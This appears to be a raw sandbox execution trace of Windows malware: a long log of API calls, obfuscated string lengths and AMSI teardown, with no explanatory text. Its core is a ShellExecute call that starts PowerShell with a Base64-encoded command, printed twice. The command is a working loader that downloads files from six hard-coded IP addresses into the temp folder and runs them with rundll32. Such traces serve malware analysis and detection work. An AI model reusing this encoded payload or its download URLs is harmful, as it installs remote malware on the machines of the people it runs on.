(param_1="%c2%a4%c3%b9%2a%c3%a6") returned 0x15 [0103.125] SysStringLen (param_1="%0b%71%c3%ac%c3%a6") returned 0x12 [0103.129] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fb680 | out: ppv=0xd6788fb680*=0x24adf97e528) returned 0x0 [0103.129] free (_Block=0x24ae148be40) [0103.129] free (_Block=0x24ae148c3e0) [0103.130] MulDiv (nNumber=1293, nNumerator=100, nDenominator=8021) returned 16 [0103.130] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0103.130] GetTickCount () returned 0x210dc2f [0103.130] SysStringLen (param_1="%c2%96%c2%a7%c2%a9%1f") returned 0x15 [0103.131] SysStringLen (param_1="%c3%87%03%c2%ab%c3%9e") returned 0x15 [0103.132] SysStringLen (param_1="%0b%c2%95%c2%84%c3%ab") returned 0x15 [0103.132] Shell:IDispatch:GetIDsOfNames (in: This=0x24adf9b3040, riid=0x7ff859893868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xd6788fcd70*="shellexecute", cNames=0x1, lcid=0xd600000409, rgDispId=0xd6788fcd78 | out: rgDispId=0xd6788fcd78*=1610809345) returned 0x0 [0103.191] Shell:IUnknown:AddRef (This=0x24adf9b3040) returned 0x2 [0103.191] Shell:IDispatch:Invoke (in: This=0x24adf9b3040, dispIdMember=1610809345, riid=0x7ff859893868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xd6788fcdb8*(rgvarg=([0]=0xd6788fce20*(varType=0x3, wReserved1=0x71e2, wReserved2=0x7ff8, wReserved3=0x0, varVal1=0x24a00000000, varVal2=0x4014000000000000), [1]=0xd6788fce38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x24ae13ca498), [2]=0xd6788fce50*(varType=0x8, wReserved1=0x71e2, wReserved2=0x7ff8, wReserved3=0x0, varVal1="", varVal2=0x24ae1459f40), [3]=0xd6788fce68*(varType=0x8, wReserved1=0x71e2, wReserved2=0x7ff8, wReserved3=0x0, varVal1="-encodedcommand \"UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQATwByAGkAZQBuAHQAZQByACAAPQAgACgAIgBoAHQAdABwADoALwAvADgANwAuADIAMwA2AC4AMQA0ADYALgA5ADMALwBwAG4AcQBnADIASAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADQANwAuADEAMwA1AC4AMgA0ADgALgAyADUAMAAvAFIAUABnAHQAMQBqAEwAaQBTAC4AZABhAHQALABoAHQAdABwADoALwAvADEANQA0AC4ANAA3AC4AMQA3AC4AMQA4ADAALwA3AFAAUQBUAHUAWABmAGIAWQBOAEcAcAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA3ADkALgAxADQAMQAuADEANwA0AC4AMgA1ADMALwBpAHoAQwA4AGcATABPADAAeABaAC4AZABhAHQALABoAHQAdABwADoALwAvADcAMAAuADMANAAuADIAMQA4AC4AOAA1AC8ARABNADMAOABxAGsAMgBhAEsAegAyADIALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANwA0AC4AMQAxADkALgAxADkAMwAuADQAOQAvAEQAeABZAGsARgBPAFYAQgBSAC4AZABhAHQAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAbgBvAG4AcABlAHMAdABpAGwAZQBuAHQAIABpAG4AIAAkAE8AcgBpAGUAbgB0AGUAcgApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAbgBvAG4AcABlAHMAdABpAGwAZQBuAHQAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADcAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAGEAbgBvAG0AbwBlAG8AbQBlAHIAeQAuAG0AZQB0AGEAbABpAHoAZQBkAEMAcgBlAGQAZQBuAGMAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAGEAbgBvAG0AbwBlAG8AbQBlAHIAeQAuAG0AZQB0AGEAbABpAHoAZQBkAEMAcgBlAGQAZQBuAGMAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABhAG4AbwBtAG8AZQBvAG0AZQByAHkALgBtAGUAdABhAGwAaQB6AGUAZABDAHIAZQBkAGUAbgBjAGUALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA=\"", varVal2=0x24ae1393f98), [4]=0xd6788fce80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="powershell", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xd6788fcdd0, puArgErr=0xd6788fcdb0 | out: pDispParams=0xd6788fcdb8*(rgvarg=([0]=0xd6788fce20*(varType=0x3, wReserved1=0x71e2, wReserved2=0x7ff8, wReserved3=0x0, varVal1=0x24a00000000, varVal2=0x4014000000000000), [1]=0xd6788fce38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x24ae13ca498), [2]=0xd6788fce50*(varType=0x8, wReserved1=0x71e2, wReserved2=0x7ff8, wReserved3=0x0, varVal1="", varVal2=0x24ae1459f40), [3]=0xd6788fce68*(varType=0x8, wReserved1=0x71e2, wReserved2=0x7ff8, wReserved3=0x0, varVal1="-encodedcommand \"UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQATwByAGkAZQBuAHQAZQByACAAPQAgACgAIgBoAHQAdABwADoALwAvADgANwAuADIAMwA2AC4AMQA0ADYALgA5ADMALwBwAG4AcQBnADIASAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADQANwAuADEAMwA1AC4AMgA0ADgALgAyADUAMAAvAFIAUABnAHQAMQBqAEwAaQBTAC4AZABhAHQALABoAHQAdABwADoALwAvADEANQA0AC4ANAA3AC4AMQA3AC4AMQA4ADAALwA3AFAAUQBUAHUAWABmAGIAWQBOAEcAcAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA3ADkALgAxADQAMQAuADEANwA0AC4AMgA1ADMALwBpAHoAQwA4AGcATABPADAAeABaAC4AZABhAHQALABoAHQAdABwADoALwAvADcAMAAuADMANAAuADIAMQA4AC4AOAA1AC8ARABNADMAOABxAGsAMgBhAEsAegAyADIALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANwA0AC4AMQAxADkALgAxADkAMwAuADQAOQAvAEQAeABZAGsARgBPAFYAQgBSAC4AZABhAHQAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAbgBvAG4AcABlAHMAdABpAGwAZQBuAHQAIABpAG4AIAAkAE8AcgBpAGUAbgB0AGUAcgApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAbgBvAG4AcABlAHMAdABpAGwAZQBuAHQAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADcAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAGEAbgBvAG0AbwBlAG8AbQBlAHIAeQAuAG0AZQB0AGEAbABpAHoAZQBkAEMAcgBlAGQAZQBuAGMAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAGEAbgBvAG0AbwBlAG8AbQBlAHIAeQAuAG0AZQB0AGEAbABpAHoAZQBkAEMAcgBlAGQAZQBuAGMAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABhAG4AbwBtAG8AZQBvAG0AZQByAHkALgBtAGUAdABhAGwAaQB6AGUAZABDAHIAZQBkAGUAbgBjAGUALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA=\"", varVal2=0x24ae1393f98), [4]=0xd6788fce80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="powershell", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xd6788fcdd0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xd6788fcdb0*=0x0) returned 0x0 [0103.602] Shell:IUnknown:Release (This=0x24adf9b3040) returned 0x1 [0103.602] SysStringLen (param_1="%c3%9d%c2%8a%c3%ae%c2%81") returned 0x18 [0103.603] SysStringLen (param_1="%c3%93%48%c2%97%c2%bc") returned 0x15 [0103.603] SysStringLen (param_1="%c2%90%4c%58%45") returned 0xf [0103.604] SysStringLen (param_1="%6a%c3%a8%c3%9e%4d") returned 0x12 [0103.604] SysStringLen (param_1="%6d%69%63%4e") returned 0xc [0103.604] SysStringLen (param_1="%c2%98%5f%55%c2%80") returned 0x12 [0103.605] SysStringLen (param_1="%c3%ae%65%50%61") returned 0xf [0103.605] SysStringLen (param_1="%68%61%72%73") returned 0xc [0103.605] SysStringLen (param_1="%68%6c%65%74") returned 0xc [0103.605] SysStringLen (param_1="%c3%a9%30%c3%b4%c2%95") returned 0x15 [0103.606] SysStringLen (param_1="%62%61%72") returned 0x9 [0103.606] SysStringLen (param_1="%c3%95%c2%ba%29%c2%a7") returned 0x15 [0103.606] SysStringLen (param_1="%c2%b9%60%02%2e") returned 0xf [0103.607] SysStringLen (param_1="%6f%73%69%74") returned 0xc [0103.607] SysStringLen (param_1="%69%6f%6e%55") returned 0xc [0103.607] SysStringLen (param_1="%c3%be%67%c2%8a%c2%bf") returned 0x15 [0103.608] SysStringLen (param_1="%c3%af%68%c2%8b") returned 0xf [0103.608] SysStringLen (param_1="%c2%8b%41%c2%8d%c2%94") returned 0x15 [0103.609] SysStringLen (param_1="%c2%ab%5e%c3%a1%c2%a6") returned 0x15 [0103.609] SysStringLen (param_1="%1a%c2%a0%5f%c2%8f") returned 0x12 [0103.610] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9320 | out: ppv=0xd6788f9320*=0x24adf97e528) returned 0x0 [0103.613] MulDiv (nNumber=3447, nNumerator=100, nDenominator=8776) returned 39 [0103.613] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0103.613] GetTickCount () returned 0x210de13 [0103.613] SysStringLen (param_1="%3a%01%0f%12") returned 0xc [0103.613] SysStringLen (param_1="%79%73%61%67") returned 0xc [0103.613] SysStringLen (param_1="%69%73%74") returned 0x9 [0103.613] SysStringLen (param_1="%1c%25%18%24") returned 0xc [0103.614] SysStringLen (param_1="%c3%b0%15%c2%ab%c3%90") returned 0x15 [0103.614] SysStringLen (param_1="%67%61%74%69") returned 0xc [0103.614] SysStringLen (param_1="%1d%62%c3%9d%c3%a8") returned 0x12 [0103.614] SysStringLen (param_1="%68%61%62%69") returned 0xc [0103.615] SysStringLen (param_1="%c3%a8%c2%8c%c3%ae") returned 0x12 [0103.615] SysStringLen (param_1="%59%69%75%43") returned 0xc [0103.615] SysStringLen (param_1="%c3%8c%c2%8e%1e%c2%95") returned 0x15 [0103.615] SysStringLen (param_1="%43%62%65%63") returned 0xc [0103.615] SysStringLen (param_1="%c2%a6%50%4d%2a") returned 0xf [0103.616] SysStringLen (param_1="%c3%ae%2f%c3%a1%01") returned 0x12 [0103.616] SysStringLen (param_1="%76%61%62%6c") returned 0xc [0103.616] SysStringLen (param_1="%65%6e%65%73") returned 0xc [0103.616] SysStringLen (param_1="%c2%be%c3%96%2b%c3%a0") returned 0x15 [0103.617] SysStringLen (param_1="%69%65%6e%6e") returned 0xc [0103.617] SysStringLen (param_1="%65%74%65") returned 0x9 [0103.617] SysStringLen (param_1="%c3%85%0f%c2%89%c3%a6") returned 0x15 [0103.618] SysStringLen (param_1="%c3%83%6e%c3%b4%07") returned 0x12 [0103.618] SysStringLen (param_1="%5a%c2%9d%c3%9d%c3%a1") returned 0x15 [0103.618] SysStringLen (param_1="%c3%bc%6e%55%4d") returned 0xf [0103.619] SysStringLen (param_1="%c2%87%54%c3%bc%c2%b7") returned 0x15 [0103.619] SysStringLen (param_1="%78%61%6d%69") returned 0xc [0103.619] SysStringLen (param_1="%6e%61%74%69") returned 0xc [0103.619] SysStringLen (param_1="%c2%98%c2%ab%c2%80%36") returned 0x15 [0103.620] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9320 | out: ppv=0xd6788f9320*=0x24adf97e528) returned 0x0 [0103.620] MulDiv (nNumber=1927, nNumerator=100, nDenominator=7381) returned 26 [0103.620] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0103.620] GetTickCount () returned 0x210de13 [0103.620] SysStringLen (param_1="%1d%c2%b2%07%3c") returned 0xf [0103.621] SysStringLen (param_1="%72%61%6e%74") returned 0xc [0103.621] SysStringLen (param_1="%c2%a6%74%c3%8b%c2%a0") returned 0x15 [0103.621] SysStringLen (param_1="%69%73%6d%49") returned 0xc [0103.621] SysStringLen (param_1="%c2%99%7c%c3%84%48") returned 0x12 [0103.622] SysStringLen (param_1="%c2%b4%c3%be%68%76") returned 0x12 [0103.622] SysStringLen (param_1="%74%6c%79") returned 0x9 [0103.622] SysStringLen (param_1="%0a%76%c3%8f%c3%92") returned 0x12 [0103.623] SysStringLen (param_1="%63%6c%61%6e") returned 0xc [0103.623] SysStringLen (param_1="%73%68%69%70") returned 0xc [0103.623] SysStringLen (param_1="%c2%be%c2%9e%00%5a") returned 0x12 [0103.623] SysStringLen (param_1="%21%c2%9a%5d%47") returned 0xf [0103.624] SysStringLen (param_1="%23%c2%af%c2%bd%c3%b0") returned 0x15 [0103.624] SysStringLen (param_1="%69%6e%6e%6f") returned 0xc [0103.624] SysStringLen (param_1="%c2%bf%5c%54%2e") returned 0xf [0103.624] SysStringLen (param_1="%6d%79%4c%44") returned 0xc [0103.624] SysStringLen (param_1="%74%65%6c%65") returned 0xc [0103.624] SysStringLen (param_1="%67%65%6e%69") returned 0xc [0103.625] SysStringLen (param_1="%6f%41%48%4f") returned 0xc [0103.625] SysStringLen (param_1="%71%c3%be%c3%91%49") returned 0x12 [0103.625] SysStringLen (param_1="%c3%b2%c2%9d%c3%b9%c2%9c") returned 0x18 [0103.625] SysStringLen (param_1="%c2%a8%c2%96%02%51") returned 0x12 [0103.626] SysStringLen (param_1="%65%6c%69%6e") returned 0xc [0103.626] SysStringLen (param_1="%c3%a0%78%61%5c") returned 0xf [0103.626] SysStringLen (param_1="%67%62%46%4c") returned 0xc [0103.626] SysStringLen (param_1="%79%73%51%55") returned 0xc [0103.626] SysStringLen (param_1="%c2%b2%61%61%4c") returned 0xf [0103.627] SysStringLen (param_1="%c2%bd%c3%ae%41%5c") returned 0x12 [0103.627] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fd1e0 | out: ppv=0xd6788fd1e0*=0x24adf97e528) returned 0x0 [0103.628] MulDiv (nNumber=1927, nNumerator=100, nDenominator=7502) returned 26 [0103.628] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0103.628] GetTickCount () returned 0x210de23 [0103.628] SysStringLen (param_1="%66%6e%64%48") returned 0xc [0103.628] SysStringLen (param_1="%c2%96%6e%79%6e") returned 0xf [0103.628] SysStringLen (param_1="%29%c2%82%c2%9f%c3%b2") returned 0x15 [0103.628] SysStringLen (param_1="%43%42%61%72") returned 0xc [0103.629] SysStringLen (param_1="%c3%bb%6f%c2%bc%01") returned 0x12 [0103.629] SysStringLen (param_1="%67%61%6c%6c") returned 0xc [0103.629] SysStringLen (param_1="%20%c3%b4%3e") returned 0xc [0103.629] SysStringLen (param_1="%c2%99%59%c3%b0%62") returned 0x12 [0103.630] SysStringLen (param_1="%30%7c%31%7c") returned 0xc [0103.630] SysStringLen (param_1="%49%c2%b0%c2%9e%7d") returned 0x12 [0103.630] SysStringLen (param_1="%c2%94%c3%90%0f%c3%ac") returned 0x15 [0103.630] SysStringLen (param_1="%39%c2%94%c2%84%c3%b8") returned 0x15 [0103.631] SysStringLen (param_1="%74%69%73%6d") returned 0xc [0103.631] SysStringLen (param_1="%58%77%67%64") returned 0xc [0103.631] SysStringLen (param_1="%53%75%70%65") returned 0xc [0103.631] SysStringLen (param_1="%72%69%6d%70") returned 0xc [0103.631] SysStringLen (param_1="%c3%a0%c3%ad%60%3b") returned 0x12 [0103.631] SysStringLen (param_1="%63%c2%a0%c2%be%c3%81") returned 0x15 [0103.632] SysStringLen (param_1="%c2%81%c2%83%04") returned 0xf [0103.632] SysStringLen (param_1="%11%47%c3%93%c3%ad") returned 0x12 [0103.633] SysStringLen (param_1="%44%69%73%63") returned 0xc [0103.633] SysStringLen (param_1="%04%c3%b2%35%c3%8c") returned 0x12 [0103.633] SysStringLen (param_1="%63%74%73") returned 0x9 [0103.633] SysStringLen (param_1="%7a%6e%71%44") returned 0xc [0103.633] SysStringLen (param_1="%c3%be%c2%85%c3%a9%c2%8b") returned 0x18 [0103.633] SysStringLen (param_1="%62%65%72%72") returned 0xc [0103.633] SysStringLen (param_1="%69%65%73%53") returned 0xc [0103.634] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9f30 | out: ppv=0xd6788f9f30*=0x24adf97e528) returned 0x0 [0103.634] MulDiv (nNumber=1962, nNumerator=100, nDenominator=7629) returned 26 [0103.634] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0103.634] GetTickCount () returned 0x210de23 [0103.634] SysStringLen (param_1="%65%70%69%6d") returned 0xc [0103.634] SysStringLen (param_1="%65%6e%74") returned 0x9 [0103.634] SysStringLen (param_1="%c2%af%45%c3%a2%4a") returned 0x12 [0103.635] SysStringLen (param_1="%c2%9f%72%c3%83%40") returned 0x12 [0103.635] SysStringLen (param_1="%61%74%6f%62") returned 0xc [0103.635] SysStringLen (param_1="%c3%aa%c2%ae%2a%c2%b6") returned 0x15 [0103.635] SysStringLen (param_1="%4f%6f%6d%69") returned 0xc [0103.635] SysStringLen (param_1="%61%63%73") returned 0x9 [0103.635] SysStringLen (param_1="%6e%4a%56%4f") returned 0xc [0103.636] SysStringLen (param_1="%7f%c2%b2%7a%c2%b0") returned 0x12 [0103.636] SysStringLen (param_1="%62%42%4d%6a") returned 0xc [0103.636] SysStringLen (param_1="%58%56%44%67") returned 0xc [0103.636] SysStringLen (param_1="%c3%99%20%c3%b8%2a") returned 0x12 [0103.636] SysStringLen (param_1="%60%c3%a8%c3%93%58") returned 0x12 [0103.637] SysStringLen (param_1="%69%72%69%73") returned 0xc [0103.637] SysStringLen (param_1="%65%54%61%6c") returned 0xc [0103.637] SysStringLen (param_1="%23%c3%b5%3a%17") returned 0xf [0103.638] SysStringLen (param_1="%6f%6f%64") returned 0x9 [0103.638] SysStringLen (param_1="%c3%af%1f%c2%ad%c3%97") returned 0x15 [0103.639] SysStringLen (param_1="%69%73%65%73") returned 0xc [0103.639] SysStringLen (param_1="%3b%c2%a4%56%c2%82") returned 0x12 [0103.640] SysStringLen (param_1="%73%65%72%69") returned 0xc [0103.640] SysStringLen (param_1="%c2%8b%40%c2%a3%1f") returned 0x12 [0103.641] SysStringLen (param_1="%72%6f%63%6c") returned 0xc [0103.641] SysStringLen (param_1="%2a%c3%b3%3e%09") returned 0xf [0103.642] SysStringLen (param_1="%c2%b8%4d%1d%3b") returned 0xf [0103.643] SysStringLen (param_1="%70%61%6e%65") returned 0xc [0103.643] SysStringLen (param_1="%6c%76%6c%6a") returned 0xc [0103.644] SysStringLen (param_1="%1e%c2%a5%c3%80%6d") returned 0x12 [0103.645] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9f30 | out: ppv=0xd6788f9f30*=0x24adf97e528) returned 0x0 [0103.645] MulDiv (nNumber=1951, nNumerator=100, nDenominator=7716) returned 25 [0103.645] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0103.645] GetTickCount () returned 0x210de32 [0103.645] SysStringLen (param_1="%c2%ac%4e%4b%0f") returned 0xf [0103.646] SysStringLen (param_1="%69%73%73%65") returned 0xc [0103.646] SysStringLen (param_1="%4d%c3%af%c3%9b%49") returned 0x12 [0103.647] SysStringLen (param_1="%6e%74%73") returned 0x9 [0103.647] SysStringLen (param_1="%3a%12%33%19") returned 0xc [0103.647] ISystemDebugEventFire:IsActive (This=0x24adf9a8d00) returned 0x1 [0103.648] IUnknown:Release (This=0x24adf9961f0) returned 0x0 [0103.648] GetACP () returned 0x4e4 [0103.648] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fedb0 | out: ppv=0xd6788fedb0*=0x24adf97e528) returned 0x0 [0103.648] free (_Block=0x24ae18cc120) [0103.648] free (_Block=0x24ae18cc570) [0103.648] free (_Block=0x24ae18cbc70) [0103.648] free (_Block=0x24ae18ccc60) [0103.649] free (_Block=0x24ae18ccb10) [0103.649] free (_Block=0x24ae18ccab0) [0103.649] free (_Block=0x24ae1890ac0) [0103.649] free (_Block=0x24ae1890a90) [0103.649] free (_Block=0x24ae1890a60) [0103.649] free (_Block=0x24ae1890430) [0103.649] free (_Block=0x24ae18901f0) [0103.649] free (_Block=0x24ae188e600) [0103.649] free (_Block=0x24ae188e420) [0103.650] free (_Block=0x24ae188e270) [0103.650] free (_Block=0x24ae139b2d0) [0103.650] free (_Block=0x24ae139aa60) [0103.650] free (_Block=0x24ae139a940) [0103.650] free (_Block=0x24ae188eed0) [0103.650] free (_Block=0x24ae188eea0) [0103.650] free (_Block=0x24ae188f080) [0103.662] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x7ff86f4e9610, dwCookie=0x100) returned 0x0 [0103.662] StdGlobalInterfaceTable:IUnknown:Release (This=0x24ae1a7ba90) returned 0x1 [0103.662] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0103.663] free (_Block=0x24ae1a7ba90) [0103.663] IUnknown:Release (This=0x24adf97e528) returned 0x0 [0103.663] ISystemDebugEventFire:EndSession (This=0x24adf9a8d00) returned 0x0 [0103.663] IUnknown:Release (This=0x24adf9a8d00) returned 0x1 [0103.664] free (_Block=0x24ae1a7ac10) [0103.664] free (_Block=0x24ae1a7c760) [0103.665] free (_Block=0x24ae1a7c6b0) [0103.665] free (_Block=0x24ae1a7c5a0) [0103.666] IUnknown:Release (This=0x24adf9a8d00) returned 0x0 [0103.666] memcpy (in: _Dst=0xd6788fee70, _Src=0x24ae13c8d30, _Size=0x10 | out: _Dst=0xd6788fee70) returned 0xd6788fee70 [0103.667] free (_Block=0x24ae13c8e20) [0103.667] free (_Block=0x24ae13c8d30) [0103.667] free (_Block=0x24ae13c8d00) [0103.667] GetProcAddress (hModule=0x7ff86ba30000, lpProcName="AmsiUninitialize") returned 0x7ff86ba32490 [0103.668] AmsiUninitialize () returned 0x1 [0103.668] FreeLibrary (hLibModule=0x7ff86ba30000) returned 1 [0103.668] free (_Block=0x24ae13c8920) [0103.668] free (_Block=0x24ae13c8e80) [0103.669] free (_Block=0x24adfc67740) [0103.669] free (_Block=0x24adfc67550) [0103.669] free (_Block=0x24adfc67a90) [0103.669] free (_Block=0x24adfc66f40) [0103.669] SendMessageA (hWnd=0xb003e, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0 [0103.670] IUnknown:Release (This=0x24adf995120) returned 0x1 [0103.670] free (_Block=0x24adfc66f00) [0103.671] free (_Block=0x24adfc66ed0) [0103.671] free (_Block=0x24adfc66e70) [0103.671] free (_Block=0x24adfc66b70) [0103.671] free (_Block=0x24adfc67030) [0103.672] memcpy (in: _Dst=0xd6788ff7e0, _Src=0x24ae1459f60, _Size=0x10 | out: _Dst=0xd6788ff7e0) returned 0xd6788ff7e0 [0103.675] free (_Block=0x24ae19fc350) [0103.679] free (_Block=0x24ae1459f40) [0103.680] free (_Block=0x24ae1a7ab80) [0103.688] free (_Block=0x24ae1459f60) [0103.688] free (_Block=0x24ae1a7abe0) [0103.732] GetProcAddress (hModule=0x7ff86ba30000, lpProcName="AmsiUninitialize") returned 0x7ff86ba32490 [0103.732] AmsiUninitialize () returned 0x1 [0103.732] FreeLibrary (hLibModule=0x7ff86ba30000) returned 1 [0103.733] free (_Block=0x24ae191bb20) [0103.733] free (_Block=0x24ae191bfa0) [0103.734] free (_Block=0x24adfc67b70) [0103.736] free (_Block=0x24ae18cdbe0) [0103.737] free (_Block=0x24adfc67980) [0103.738] free (_Block=0x24adfc67940) [0103.738] free (_Block=0x24adfc67050) [0103.738] free (_Block=0x24adfc67090) [0103.738] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0xd6788ff870 | out: ppMalloc=0xd6788ff870*=0x7ff86f4ea480) returned 0x0 [0103.739] IMalloc:Free (This=0x7ff86f4ea480, pv=0x24adf9a88a0) [0103.739] IUnknown:AddRef (This=0x7ff86f4ea480) returned 0x1 [0103.739] FreeLibrary (hLibModule=0x7ff864110000) returned 1 [0103.741] free (_Block=0x24adfc67580) [0103.741] IUnknown:Release (This=0x24adf995120) returned 0x0 [0103.742] free (_Block=0x24adfc66f60) [0103.742] SendMessageA (hWnd=0xb003e, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0 [0103.742] PostMessageA (hWnd=0xb003e, Msg=0x12, wParam=0x0, lParam=0x0) returned 1 [0103.746] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0xd6788ff8a0*=0x124, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff) returned 0x0 [0103.746] CloseHandle (hObject=0x124) returned 1 [0103.747] free (_Block=0x24adfc65b00) [0103.747] IUnknown:Release (This=0x24adf98aee0) returned 0x0 [0103.748] free (_Block=0x24adfc65a40) [0103.748] IUnknown:Release (This=0x24adf98af90) returned 0x0 [0103.748] free (_Block=0x24adfc65aa0) [0103.749] IUnknown:Release (This=0x24adf98b040) returned 0x0 [0103.749] free (_Block=0x24adfc659a0) [0103.749] IUnknown:Release (This=0x24adf98ae30) returned 0x0 [0103.750] free (_Block=0x24adfc65910) [0103.750] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0xd6788ff8a0 | out: lplpMessageFilter=0xd6788ff8a0*=0x24adfc658e0) returned 0x0 [0103.751] free (_Block=0x24adfc658e0) [0103.751] CoUninitialize () [0103.751] DllCanUnloadNow () returned 0x1 [0103.751] DllCanUnloadNow () returned 0x0 [0103.752] free (_Block=0x24ae1459f80) [0103.752] free (_Block=0x24adfc66d20) [0103.754] free (_Block=0x24adfc66d60) [0103.754] free (_Block=0x24adfc66ba0) [0103.755] free (_Block=0x24adfc66c20) [0103.755] free (_Block=0x24adfc66be0) [0103.756] free (_Block=0x24adfc66c60) [0103.756] free (_Block=0x24adfc66df0) [0103.756] free (_Block=0x24adfc66ca0) [0103.757] free (_Block=0x24adfc66e30) [0103.757] free (_Block=0x24adfc66ce0) [0103.757] malloc (_Size=0x20) returned 0x24ae1480800 [0103.758] free (_Block=0x24adfc66da0) [0103.758] free (_Block=0x24ae1480800) [0103.759] free (_Block=0x24adfc66b20) [0103.759] free (_Block=0x24adfc66a10) [0106.590] free (_Block=0x24ae1a7cc20) [0106.591] free (_Block=0x24ae145c800) [0106.599] free (_Block=0x24ae1459ee0) [0106.600] free (_Block=0x24adfc67fa0) [0106.600] free (_Block=0x24ae13c8860) [0106.601] free (_Block=0x24ae1459e90) [0106.602] free (_Block=0x24ae13cedf0) [0106.602] free (_Block=0x24ae13cf780) 